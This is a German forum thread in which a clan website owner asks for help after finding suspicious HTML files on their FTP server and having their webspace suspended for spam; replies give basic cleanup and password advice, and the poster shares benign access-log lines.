ilch Forum » Allgemein » HTML, PHP, SQL,... » aD7NJ.html Virus?

Geschlossen
  1. Fr. 04.10.2013 18:34 Uhr #1
    User Pic
    Isalapisa Mitglied
    Registriert seit
    05.07.2012
    Beiträge
    135
    Beitragswertungen
    1 Beitragspunkte
    Guten Tag allerseits, heute bin ich mal nach langer Zeit mit FileZilla auf unseren FTP Server (Clan Homepage) raufgegangen und habe gleich 2 merkwürdige html-dateien entdeckt.

    Als ich sie mir auf meinem Rechner runtergezogen hab, warnte mich Avast vor einem Virus und stopfte dies gleich in den Container.

    Was nun tun, jemand solch erfahrung gemacht?
    Die aD7NJ.html habe ich nun gelöscht


    ps: im Internet bin ich nur auf das hier gestoßen
    HTML-Viren
    AUF EINEN BLICK
    Gefahr - Zugriff von außen auf das System
    Quelle - Präparierte Webseiten
    Schutz - Regelmäßige Updates des Antivirenprogramms
    Entfernen - Durch spezielle Antivirussoftware
    Beispiele - HTML.Internal-Virus, Exploit-MhtRedir.gen, exploit.HTML.Mht


    Zuletzt modifiziert von Isalapisa am 04.10.2013 - 18:36:05
    0 Mitglieder finden den Beitrag gut.
  2. Fr. 04.10.2013 18:38 Uhr #2
    User Pic
    Siggi Hall Of Fame
    Registriert seit
    08.02.2007
    Beiträge
    6.558
    Beitragswertungen
    327 Beitragspunkte
    Bisher keine Erfahrung gemacht aber wenn man fast sicher ist und das bei den Dateinamen das es unnütz ist würde ich diese Löschen?
    Wie poste ich falsch?
    0 Mitglieder finden den Beitrag gut.
  3. Fr. 04.10.2013 23:01 Uhr #3
    User Pic
    Revolution Hall Of Fame
    Registriert seit
    14.08.2006
    Beiträge
    1.688
    Beitragswertungen
    109 Beitragspunkte
    sowas gibt es schon.... diese Dateien binden häufig schadcode in form von JS ein.... und dieser nutzt dann lücken im Browser etc... will das Thema hier ganricht vertiefen...

    Frage:
    Speicherst du das PW der Webseite mit Filezilla?

    Falls Ja, ändere das Passwort und speicher es nicht mehr mit filezilla ab.
    FZ speichert alle Passwörter im Klartext also da keine Sicherheit vorhanden...

    Wenn du dasd PW umbedingt speichern musst nutze KeyPass oder einen anderen FTP Client...


    Weiteres vorgehen:
    Es bleibt somit die Gefahr das auch andere Dateien Schadcode enthalten, achte mal auf das Änderungsdatum der Dateien.
    Kreativ, modern, Conversion und Usability optimiert
    individuelles Webdesign für ein optimales Erscheinungsbild
    404studios
    0 Mitglieder finden den Beitrag gut.
  4. Mo. 07.10.2013 18:26 Uhr #4
    User Pic
    Isalapisa Mitglied
    Registriert seit
    05.07.2012
    Beiträge
    135
    Beitragswertungen
    1 Beitragspunkte
    Ja ich nutze Filezilla um auf den FTP Server zu gelanden und ja ich hab mein Passwort immer dort gespeichert.

    Problem die 2 Dateien sind wieder aufgetaucht obowhl ich die gelöscht hatte, zudem wurde nun heute mein Webspace gesperrt von meinem Anbieter.

    Anbieter schrieb mir diese Email: Wie behebe ich das problem allein?

    ZitatZitat
    Sehr ge*******,

    auf Grund eines Sicherheitsproblems wurde Ihre Webspace mit allen Domains von uns deaktiviert, damit wir für andere Kunden auf dem Server den reguläre Serverbetrieb weiter gewährleisten können und keine weiteren Schäden über Ihren Account verursacht werden.

    Über Ihren Account wurde Spam versendet.

    Mögliche Ursachen:
    - unsicheres Passwort WebAccount (Administration - Confixx - FTP)
    - unsicheres Passwort EMail-Postfächer
    - Sicherheitslücke in den verwendeten Scripten

    Eine Analyse Ihrer Webspacedaten hat durch uns nicht stattgefunden, da wir hierzu ohne Ihre Auftrag nicht befugt sind. Eine Überprüfung Ihrer Daten können Sie über unseren Support beauftragen. Die Berechnung erfolgt aufwandsabhängig zu 5,00 EUR je angefangene 4min Arbeitszeit.

    Es empfiehlt sich den access_log per FTP im Ordner /log und die Zugriffsstatistik unter Confixx anzuschauen. In den meisten Fällen sind hier bereits Ursachen für Spamversand, Phishing oder sonstige Ausführungen schadhafter Scripte erkennbar.

    Weitere empfohlenen Schritte:

    scannen Sie Ihren Computer auf Viren und Trojaner www.eset.com/onlinescan
    schauen Sie via FTP nach veränderten Dateien
    ändern Sie sämtliche Passwörter (Administration - Confixx / FTP, Datenbank, EMail, Backend usw.) nach dem Scann
    aktualisieren Sie ihre Webseite (eigene Scripte, Joomla, WordPress, Typo3 o.a.)
    entfernen Sie nicht benötigte Erweiterungen/Plugins aus einem verwendetem CMS
    führen Sie regelmäßig Updates am eigenen Computer durch


    Eine Aktivierung Ihrer Domains ist erst nach Beseitigung des Sicherheitsproblems und Rückmeldung an unseren Support möglich.

    Bei Fragen stehen wir Ihnen jederzeit gerne zur Verfügung.

    Mit freundlichen Grüßen
    Ihre Kundenbetreuung

    Webspace4All
    Inh. Patrick Nordhausen
    Buddenbaumstrasse 4b
    D 48231 Warendorf


    werde nun versuchen selbst diese schritte zu gehen wie beschrieben hoffe aber auf tipps noch von euch zwinker




    Zuletzt modifiziert von Isalapisa am 22.11.2013 - 19:15:04
    0 Mitglieder finden den Beitrag gut.
  5. Mo. 07.10.2013 20:34 Uhr #5
    User Pic
    Revolution Hall Of Fame
    Registriert seit
    14.08.2006
    Beiträge
    1.688
    Beitragswertungen
    109 Beitragspunkte
    Wie bereits gesagt ich kann dir nur raten keine PW mit Filezilla zu speichern...
    Die Entwickler diese Software tun nichts "garnichts" um deine PW auch nur etwas zu sichern...

    Es ist ohne probleme möglich diese zu lesen und per Software an ein Server etc zu senden...etc...

    Daher der Tipp:
    PW Ändern und nicht mehr speichern, zumindest nicht in FZ.
    Alle PHP Files ersetzen, evt ist eine Shell Datei oder sonst was feines enthalten...
    Rechner mit Virenscanner checken
    zusätzlich malwarebyte nutzen

    Schau dir die Logfiles an, meistens sind häufige Zugriffe auf eine PHP zufinden... über diese erfolgt dann das einschleusen von weiterem Schadcode.

    (kann mir deine nicht ansehen)


    Zuletzt modifiziert von Revolution am 07.10.2013 - 20:35:07
    Kreativ, modern, Conversion und Usability optimiert
    individuelles Webdesign für ein optimales Erscheinungsbild
    404studios
    0 Mitglieder finden den Beitrag gut.
  6. Mo. 07.10.2013 22:00 Uhr #6
    User Pic
    Isalapisa Mitglied
    Registriert seit
    05.07.2012
    Beiträge
    135
    Beitragswertungen
    1 Beitragspunkte
    einfach bei der datei mit editor öffnen 

    5.10.83.72 - - [01/Oct/2013:02:14:13 +0200] "GET /index.php?kalender-v1-m2-y2014-d20 HTTP/1.1" 200 8954 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
5.10.83.96 - - [01/Oct/2013:02:14:37 +0200] "GET /index.php?map-show_group-4 HTTP/1.1" 200 9460 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
5.10.83.68 - - [01/Oct/2013:02:16:49 +0200] "GET /index.php?kalender-v1-m8-y2013-d15 HTTP/1.1" 200 8973 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
5.10.83.27 - - [01/Oct/2013:02:17:17 +0200] "GET /index.php?sitemap-news HTTP/1.1" 200 9149 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
5.10.83.48 - - [01/Oct/2013:02:17:41 +0200] "GET /index.php?kalender-v1-m3-y2013-d8 HTTP/1.1" 200 8972 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
91.66.197.155 - - [01/Oct/2013:02:18:19 +0200] "GET /index.php?startseite HTTP/1.1" 200 10803 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:19 +0200] "GET /include/designs/mar_CyNect/images/optimiert.png HTTP/1.1" 200 11983 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:19 +0200] "GET /include/images/avatars/2.png HTTP/1.1" 200 59311 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/wurstegal.jpg HTTP/1.1" 404 257 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:19 +0200] "GET /include/images/avatars/4.png HTTP/1.1" 200 62475 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/17.png HTTP/1.1" 200 57703 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:19 +0200] "GET /include/images/avatars/12.png HTTP/1.1" 200 52291 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/15.png HTTP/1.1" 200 43070 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/6.png HTTP/1.1" 200 58093 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/9.png HTTP/1.1" 200 39426 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/11.jpg HTTP/1.1" 200 11637 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/24.png HTTP/1.1" 200 53556 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:19 +0200] "GET /include/images/avatars/1.png HTTP/1.1" 200 69969 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/25.jpg HTTP/1.1" 200 55870 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/back.png HTTP/1.1" 200 4046 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/5.png HTTP/1.1" 200 52879 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/next.png HTTP/1.1" 200 4072 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/1.gif HTTP/1.1" 200 125 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/2.gif HTTP/1.1" 200 126 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/3.gif HTTP/1.1" 200 124 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/5.gif HTTP/1.1" 200 125 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/4.gif HTTP/1.1" 200 128 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/6.gif HTTP/1.1" 200 127 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/7.gif HTTP/1.1" 200 126 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/8.gif HTTP/1.1" 200 126 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/9.gif HTTP/1.1" 200 888 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/smiles/10.gif HTTP/1.1" 200 106 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/16.png HTTP/1.1" 200 80915 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/designs/mar_CyNect/bannerrotator/banner/banner9.png HTTP/1.1" 200 74796 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/images/avatars/wurstegal.jpg HTTP/1.1" 404 257 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/designs/mar_CyNect/bannerrotator/banner/banner7.jpg HTTP/1.1" 200 72160 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/designs/mar_CyNect/bannerrotator/banner/banner6.jpg HTTP/1.1" 200 52042 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/designs/mar_CyNect/bannerrotator/banner/banner8.jpg HTTP/1.1" 200 51687 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/designs/mar_CyNect/bannerrotator/banner/banner4.jpg HTTP/1.1" 200 64669 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/designs/mar_CyNect/bannerrotator/banner/banner2.jpg HTTP/1.1" 200 50570 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/icons/boxen/online.png HTTP/1.1" 200 863 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/icons/boxen/allianz.png HTTP/1.1" 200 888 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/icons/boxen/statistik.png HTTP/1.1" 200 864 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/icons/boxen/geburtstag.png HTTP/1.1" 200 826 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/icons/boxen/infobox.png HTTP/1.1" 200 779 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/icons/online.gif HTTP/1.1" 200 125 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/designs/mar_CyNect/bannerrotator/banner/banner14.png HTTP/1.1" 200 144007 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/icons/offline.gif HTTP/1.1" 200 116 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/infobox/ip.png HTTP/1.1" 404 252 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/infobox/host.png HTTP/1.1" 404 254 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/infobox/datum.png HTTP/1.1" 404 254 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/teams/linkusbof-small.png HTTP/1.1" 200 28807 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/sta.png HTTP/1.1" 200 248 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/social_icon_but/youtube.png HTTP/1.1" 200 5000 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/social_icon_but/steam.png HTTP/1.1" 200 1398 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:20 +0200] "GET /include/designs/mar_CyNect/bannerrotator/banner/banner11.png HTTP/1.1" 200 156193 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/social_icon_but/contact.png HTTP/1.1" 200 5895 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/LoginPanel/tab_b.png HTTP/1.1" 200 157 "http://bof-clan.eu/include/includes/css/slide.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/LoginPanel/tab_l.png HTTP/1.1" 200 976 "http://bof-clan.eu/include/includes/css/slide.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/LoginPanel/tab_m.png HTTP/1.1" 200 221 "http://bof-clan.eu/include/includes/css/slide.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/LoginPanel/bt_open.png HTTP/1.1" 200 1841 "http://bof-clan.eu/include/includes/css/slide.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/LoginPanel/tab_r.png HTTP/1.1" 200 987 "http://bof-clan.eu/include/includes/css/slide.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/box_news.png HTTP/1.1" 200 12078 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/box_forum.png HTTP/1.1" 200 3544 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/but_boxforum_n.png HTTP/1.1" 200 1139 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/box_userslid.png HTTP/1.1" 200 8702 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/includes/css/teamSlider/arrows.png HTTP/1.1" 200 3152 "http://bof-clan.eu/include/includes/css/teamSlider/teamSlider.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/bg_page.png HTTP/1.1" 200 172 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/bg_navigation.gif HTTP/1.1" 200 44011 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/top_left_menu.gif HTTP/1.1" 200 6302 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/top_left.gif HTTP/1.1" 200 8019 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/middle_left.png HTTP/1.1" 200 209 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/menu_normal.png HTTP/1.1" 200 583 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/bottom_left.png HTTP/1.1" 200 262 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/sh_bg.png HTTP/1.1" 200 2553 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/extras_button.png HTTP/1.1" 200 491 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/content_middle.png HTTP/1.1" 200 163 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/foot_content.png HTTP/1.1" 200 231 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/top_right_menu.gif HTTP/1.1" 200 6293 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/top_right.png HTTP/1.1" 200 3469 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/middle_right.png HTTP/1.1" 200 212 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/bottom_right.png HTTP/1.1" 200 266 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/bg_footer1.png HTTP/1.1" 200 18742 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/top.png HTTP/1.1" 200 1237 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
